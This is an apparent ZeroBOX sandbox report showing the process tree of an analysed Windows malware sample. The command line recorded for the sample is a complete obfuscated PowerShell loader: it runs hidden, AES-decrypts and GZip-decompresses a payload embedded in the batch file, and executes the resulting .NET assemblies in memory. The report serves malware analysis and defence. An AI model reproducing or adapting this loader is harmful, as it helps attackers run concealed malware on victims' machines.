popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "IZFDLWw" C:\Users\test22\AppData\Local\Temp\Uzlrz_SC.bat

    2628

    • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Uzlrz_SC.bat

      2708

      • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Uzlrz_SC.bat

        2832

        • Uzlrz_SC.bat.exe "C:\Users\test22\AppData\Local\Temp\Uzlrz_SC.bat.exe" -w hidden -c $sXoe='RerwlVadLrwlVinrwlVesrwlV'.Replace('rwlV', '');$KaIy='LoarwlVdrwlV'.Replace('rwlV', '');$onqo='MainrwlVMrwlVodrwlVulerwlV'.Replace('rwlV', '');$KLcx='ErwlVntrwlVrrwlVyPrwlVoirwlVntrwlV'.Replace('rwlV', '');$NmCP='ChrwlVangerwlVExrwlVterwlVnsirwlVonrwlV'.Replace('rwlV', '');$jpXv='TrrwlVansrwlVforrwlVmFrwlVirwlVnrwlValBrwlVlorwlVcrwlVkrwlV'.Replace('rwlV', '');$Nlmp='FrrwlVomrwlVBrwlVarwlVserwlV64SrwlVtrirwlVnrwlVgrwlV'.Replace('rwlV', '');$IcUZ='SplrwlVitrwlV'.Replace('rwlV', '');$eKgM='IrwlVnrwlVvorwlVkerwlV'.Replace('rwlV', '');$SUjx='CrwlVrearwlVtrwlVeDrwlVecrrwlVyptrwlVorwlVrrwlV'.Replace('rwlV', '');$owoP='GerwlVtrwlVCrwlVurrrwlVenrwlVtPrrwlVocerwlVssrwlV'.Replace('rwlV', '');$Dtpc='ElerwlVmenrwlVtArwlVtrwlV'.Replace('rwlV', '');function OiDfk($keSfh){$reuLO=[System.Security.Cryptography.Aes]::Create();$reuLO.Mode=[System.Security.Cryptography.CipherMode]::CBC;$reuLO.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$reuLO.Key=[System.Convert]::$Nlmp('X34De+rRqYNTzCDjE5BRuwqEn5fBK2YeaJRW5VUWpOY=');$reuLO.IV=[System.Convert]::$Nlmp('4umJ7MRNH2/L2CHuH0lqMQ==');$dfErF=$reuLO.$SUjx();$EKKSK=$dfErF.$jpXv($keSfh,0,$keSfh.Length);$dfErF.Dispose();$reuLO.Dispose();$EKKSK;}function elXrX($keSfh){$tAeHV=New-Object System.IO.MemoryStream(,$keSfh);$ERjwk=New-Object System.IO.MemoryStream;$dXDEj=New-Object System.IO.Compression.GZipStream($tAeHV,[IO.Compression.CompressionMode]::Decompress);$dXDEj.CopyTo($ERjwk);$dXDEj.Dispose();$tAeHV.Dispose();$ERjwk.Dispose();$ERjwk.ToArray();}$bfNFF=[System.Linq.Enumerable]::$Dtpc([System.IO.File]::$sXoe([System.IO.Path]::$NmCP([System.Diagnostics.Process]::$owoP().$onqo.FileName, $null)), 1);$OhhoA=$bfNFF.Substring(2).$IcUZ(':');$YalwE=elXrX (OiDfk ([Convert]::$Nlmp($OhhoA[0])));$xFGRa=elXrX (OiDfk ([Convert]::$Nlmp($OhhoA[1])));[System.Reflection.Assembly]::$KaIy([byte[]]$xFGRa).$KLcx.$eKgM($null,$null);[System.Reflection.Assembly]::$KaIy([byte[]]$YalwE).$KLcx.$eKgM($null,$null);

          2924

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf